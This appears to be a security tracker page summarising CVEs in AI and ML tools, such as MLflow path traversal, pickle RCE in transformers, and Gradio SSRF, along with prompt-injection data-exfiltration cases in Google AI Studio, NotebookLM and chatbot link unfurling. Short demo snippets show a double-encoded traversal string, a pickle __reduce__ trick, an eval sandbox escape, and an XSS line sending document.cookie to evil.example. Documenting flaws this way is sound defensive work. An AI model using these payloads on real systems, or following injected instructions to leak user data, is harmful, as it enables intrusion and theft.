All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
CVE-2024-1594 is a path traversal vulnerability (a flaw that lets attackers access files outside their permitted directory) in MLflow's experiment creation feature. Attackers can exploit this by inserting a fragment component (#) into the artifact_location parameter to read arbitrary files on the server.
MLflow, a machine learning platform, has a path traversal vulnerability (a security flaw where attackers can access files outside intended directories) caused by improper handling of URL parameters. Attackers can use the semicolon (;) character to hide malicious path sequences in URLs, potentially gaining unauthorized access to sensitive files or compromising the server.
A path traversal vulnerability (a security flaw where attackers use special characters like ../ to access files outside their intended directory) exists in MLflow's artifact deletion feature. Attackers can delete arbitrary files on a server because an extra URL-decoding step is applied after input validation, so encoded traversal sequences slip past the check; the vulnerability affects versions up to 2.9.2.
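The bypass pattern behind this class of bug can be sketched in a few lines: if a server validates a path and then URL-decodes it again afterwards, a double-encoded traversal sequence passes the check and only becomes `../` later. This is an illustrative sketch of the mechanism, not MLflow's actual code:

```python
from urllib.parse import unquote

# Double-encoded traversal: "%252e" decodes to "%2e", which decodes to "."
user_input = "%252e%252e%2fetc%2fpasswd"

once = unquote(user_input)    # "%2e%2e/etc/passwd" -- no literal "../" yet
assert ".." not in once       # a naive check at this stage passes

twice = unquote(once)         # the traversal sequence appears only now
assert twice == "../etc/passwd"
```

Validating only after all decoding is complete (or rejecting any input that still contains percent-encoding after one decode) closes this gap.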
CVE-2024-1558 is a path traversal vulnerability (a security flaw where an attacker uses special characters like "../" to access files outside their intended directory) in MLflow's model version creation function. An attacker can craft a malicious `source` parameter that bypasses the validation check, allowing them to read any file on the server when fetching model artifacts.
HackSpaceCon 2024, held at Kennedy Space Center, featured a keynote by Dave Kennedy on making the world safer through security practices. Kennedy highlighted that attackers can easily modify existing malware (pre-written malicious code) to evade detection systems, and emphasized the importance of active threat hunting (proactively searching for signs of attacks rather than waiting for alerts).
Stable-diffusion-webui version 1.7.0 has a vulnerability where user input from the Backup/Restore tab is not properly validated before being used to create file paths, allowing attackers to write JSON files to arbitrary locations on Windows systems where the web server has access. This is a limited file write vulnerability (a security flaw that lets attackers create or modify files in unintended locations) that could let an attacker place malicious files on the server.
CVE-2023-51409 is a vulnerability in the Jordy Meow AI Engine: ChatGPT Chatbot plugin (versions up to 1.9.98) that allows unrestricted upload of dangerous file types, meaning attackers can upload files that shouldn't be allowed without proper validation. This vulnerability could potentially lead to remote code execution (running malicious commands on the affected system).
The huggingface/transformers library has a vulnerability where attackers can run arbitrary code on a victim's machine by tricking them into loading a malicious checkpoint file. The problem occurs in the `load_repo_checkpoint()` function, which uses `pickle.load()` (a Python function that reconstructs objects from serialized data) on data that might come from untrusted sources, leading to remote code execution (RCE, where an attacker runs commands on a system they don't own).
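The underlying mechanism is easy to demonstrate: unpickling can invoke an arbitrary callable chosen by whoever produced the bytes. A minimal illustration, with a harmless builtin standing in for something like `os.system`:

```python
import pickle

class Malicious:
    # __reduce__ tells pickle how to rebuild the object: a callable plus
    # arguments, which pickle.loads() then invokes blindly.
    def __reduce__(self):
        # A real exploit would return (os.system, ("<shell command>",));
        # the harmless builtin len stands in to demonstrate the mechanism.
        return (len, ("pwned",))

payload = pickle.dumps(Malicious())
result = pickle.loads(payload)  # the attacker-chosen callable runs here
assert result == 5  # len("pwned") -- proof the callable executed
```

This is why checkpoints from untrusted sources should be loaded via data-only formats (such as safetensors) or with restricted unpicklers rather than raw `pickle.load()`.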
A vulnerability was found in the `safe_eval` function of the `llama_index` package that allows prompt injection (tricking an AI by hiding instructions in its input) to execute arbitrary code (running code an attacker chooses). The flaw exists because the input validation is insufficient, meaning the package doesn't properly check what data is being passed in, allowing attackers to bypass safety restrictions that were meant to prevent this type of attack.
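The general weakness is that eval-based "safe" evaluators are hard to lock down: even with builtins stripped, a Python expression can climb to dangerous objects through dunder attributes. An illustrative escape (not the exact `llama_index` payload):

```python
# Even with __builtins__ emptied, this expression walks from an empty tuple
# to the list of every loaded class -- a standard eval-sandbox escape that
# attackers extend to reach subprocess or os functionality.
expr = "().__class__.__bases__[0].__subclasses__()"
classes = eval(expr, {"__builtins__": {}}, {})
assert isinstance(classes, list) and len(classes) > 0
```

Denylist-style input validation rarely anticipates every such path, which is why patched versions replace or heavily restrict the evaluation step.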
The LearnPress WordPress LMS Plugin (learning management system plugin for WordPress) is vulnerable to stored cross-site scripting (XSS, where an attacker can inject harmful code into a webpage) in versions up to 4.2.6.3. Attackers with instructor-level access can inject malicious scripts into course, lesson, and quiz titles and content due to insufficient input sanitization (cleaning user input) and output escaping (converting special characters so they display as text rather than code), and these scripts will run whenever users visit the affected pages.
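Output escaping, the missing defense here, converts HTML metacharacters into entities so injected markup renders as inert text. A generic Python illustration of the concept (LearnPress itself is PHP, so this is not the plugin's code):

```python
from html import escape

# A title an instructor-level attacker might submit
title = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'

# Escaped, the payload displays as literal text instead of executing
safe_title = escape(title)
assert "<script>" not in safe_title
assert safe_title.startswith("&lt;script&gt;")
```

Stored XSS requires both halves of the fix: sanitizing on input where rich markup is not expected, and escaping on output everywhere user-supplied text is rendered.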
Ollama before version 0.1.29 has a DNS rebinding vulnerability (a technique where an attacker tricks a system into connecting to a malicious server by manipulating how domain names are translated into addresses), which allows unauthorized remote access to its full API. This vulnerability could let an attacker interact with the language model, remove models, or cause a denial of service (making a system unavailable by overloading it with requests).
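DNS rebinding succeeds because the victim's browser connects to the locally bound API while believing it is talking to the attacker's domain; the HTTP Host header still carries that attacker domain, so a local API can defend itself by rejecting unexpected hosts. A minimal sketch of that check (the allow-list is an assumption for illustration, not Ollama's actual code; 11434 is Ollama's default port):

```python
# Assumed allow-list for an API bound to localhost; any other Host header
# suggests the request arrived via a rebound DNS name.
ALLOWED_HOSTS = {"localhost", "127.0.0.1"}

def host_is_trusted(host_header: str) -> bool:
    host = host_header.split(":")[0].lower()  # drop the optional port
    return host in ALLOWED_HOSTS

assert host_is_trusted("127.0.0.1:11434") is True
assert host_is_trusted("attacker.example") is False
```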
GPT Academic is a tool that provides interactive interfaces for large language models. Versions 3.64 through 3.73 have a vulnerability where the server deserializes untrusted data (processes data from users without verifying it's safe), which could allow attackers to execute code remotely on any exposed server. Any device running these vulnerable versions and accessible over the internet is at risk.
Google AI Studio had a vulnerability that allowed attackers to steal data through prompt injection (tricking an AI by hiding malicious instructions in its input), where a malicious file could trick the AI into exfiltrating other uploaded files to an attacker's server via image tags. The vulnerability appeared in a recent update but was fixed within 12 days of being reported to Google on February 17, 2024.
Gradio, a popular Python library for building AI interfaces, has a vulnerability in its `/component_server` endpoint that lets attackers call any method on a Component class with their own arguments. By exploiting a specific method called `move_resource_to_block_cache()`, attackers can copy files from the server's filesystem to a temporary folder and download them, potentially exposing sensitive data like API keys, especially when apps are shared online or hosted on platforms like Hugging Face.
CVE-2024-1483 is a path traversal vulnerability (a weakness that lets attackers access files outside intended directories) in MLflow version 2.9.2 that allows attackers to read arbitrary files on a server. The vulnerability occurs because the server doesn't properly validate user input in the 'artifact_location' and 'source' parameters, and attackers can exploit this by sending specially crafted HTTP POST requests that use '#' instead of '?' in local URIs to navigate the server's directory structure.
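The '#' trick works because standard URI parsing stops the path at the fragment delimiter: validation that inspects the parsed path sees a harmless location, while code that later consumes the raw string still carries the traversal. The effect is visible with Python's `urlparse` (illustrative; MLflow's internal parsing may differ):

```python
from urllib.parse import urlparse

uri = "http://host/artifacts#/../../../etc/passwd"
parsed = urlparse(uri)

# The path a validator inspects looks clean...
assert parsed.path == "/artifacts"
# ...while the traversal sequence hides in the fragment
assert parsed.fragment == "/../../../etc/passwd"
```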
CVE-2024-1183 is an SSRF vulnerability (a flaw where an attacker tricks a server into making requests to internal networks) in the Gradio application that lets attackers scan and identify open ports on internal networks by manipulating the 'file' parameter in requests and reading responses for specific headers or error messages.
Fix: A patch is available at https://github.com/gradio-app/gradio/commit/2ad3d9e7ec6c8eeea59774265b44f11df7394bb4
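A common mitigation for this class of SSRF is to resolve the requested host and refuse private, loopback, or link-local addresses before fetching anything. A sketch using only the standard library (generic hardening, not the actual Gradio patch):

```python
import ipaddress
import socket

def is_internal(host: str) -> bool:
    """Return True if the host resolves to an address SSRF should not reach."""
    try:
        addr = ipaddress.ip_address(socket.gethostbyname(host))
    except (socket.gaierror, ValueError):
        return True  # fail closed on unresolvable input
    return addr.is_private or addr.is_loopback or addr.is_link_local

assert is_internal("127.0.0.1") is True  # loopback
assert is_internal("10.0.0.5") is True   # RFC 1918 private range
```

Note that a robust implementation must also re-check the address at connection time, since DNS answers can change between validation and use.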
NVD/CVE Database
Google's NotebookLM is a tool that lets users upload files for an AI to analyze, but it's vulnerable to prompt injection (tricking the AI by hiding instructions in uploaded files) that can manipulate the AI's responses and what users see. The tool also has a data exfiltration vulnerability (attackers stealing information) when processing untrusted files, and there is currently no known way to prevent these attacks, meaning users cannot fully trust the AI's responses when working with files from unknown sources.
Qdrant (a vector database software) has a vulnerability in its snapshot upload endpoint that allows attackers to upload files to any location on the server's filesystem through path traversal (using special file path sequences to access directories they shouldn't). This could let attackers execute arbitrary code on the server and damage the system's integrity and availability.
Fix: A patch is available at https://github.com/qdrant/qdrant/commit/e6411907f0ecf3c2f8ba44ab704b9e4597d9705d
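The standard defense against this kind of upload traversal is to resolve the final destination and verify it stays inside the intended directory before writing. A minimal containment check (illustrative only; the directory path is an assumption, not Qdrant's layout or patch):

```python
import os

def is_safely_contained(base_dir: str, user_path: str) -> bool:
    # Resolve the final path and confirm it stays inside base_dir --
    # the kind of check an upload endpoint should apply before writing.
    target = os.path.realpath(os.path.join(base_dir, user_path))
    base = os.path.realpath(base_dir)
    return os.path.commonpath([base, target]) == base

# A traversal sequence escapes the assumed snapshot directory
assert is_safely_contained("/var/lib/qdrant/snapshots", "../../etc/crontab") is False
assert is_safely_contained("/var/lib/qdrant/snapshots", "backup.snapshot") is True
```

Comparing resolved real paths (rather than string prefixes) also defeats tricks like `snapshots_evil` sibling directories and symlink indirection.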
NVD/CVE Database
Gradio (a framework for building AI interfaces) has a vulnerability in its UploadButton component where it doesn't properly validate (check) user input, allowing attackers to read any file on the server by manipulating file paths sent to the `/queue/join` endpoint. This could let attackers steal sensitive files like SSH keys (credentials used for secure server access) and potentially execute arbitrary code on the system.
Fix: The source indicates a fix exists in version 4.2.6.4, as referenced in the WordPress plugin changeset URL (https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042945%40learnpress%2Ftags%2F4.2.6.3&new=3061851%40learnpress%2Ftags%2F4.2.6.4), which compares the vulnerable 4.2.6.3 version to the patched 4.2.6.4 version. Users should update to version 4.2.6.4 or later.
NVD/CVE Database
Fix: Update Ollama to version 0.1.29 or later.
NVD/CVE Database
Fix: Upgrade to version 3.74, which contains a patch for the issue. The source states: 'There are no known workarounds aside from upgrading to a patched version.'
NVD/CVE Database
Fix: Google fixed the issue; it no longer reproduced by the time the company responded to the report 12 days later (approximately February 29, 2024). The ticket was closed as 'Duplicate' on March 3, 2024, suggesting the vulnerability may have also been caught through internal testing.
Embrace The Red
Unfurling is when an application automatically expands hyperlinks to show previews, which can be exploited in AI chatbots to leak data. When an attacker uses prompt injection (tricking an AI by hiding instructions in its input) to make the chatbot generate a link containing sensitive information from earlier conversations, the unfurling feature automatically sends that data to a third-party server, potentially exposing private information.
Fix: To disable unfurling in Slack Apps, include the unfurl settings in the JSON object when creating the message, setting "unfurl_links": False and "unfurl_media": False, as shown in the example code:

```python
import json

def create_message(text):
    message = {
        "text": text,
        "unfurl_links": False,
        "unfurl_media": False
    }
    return json.dumps(message)
```
Embrace The Red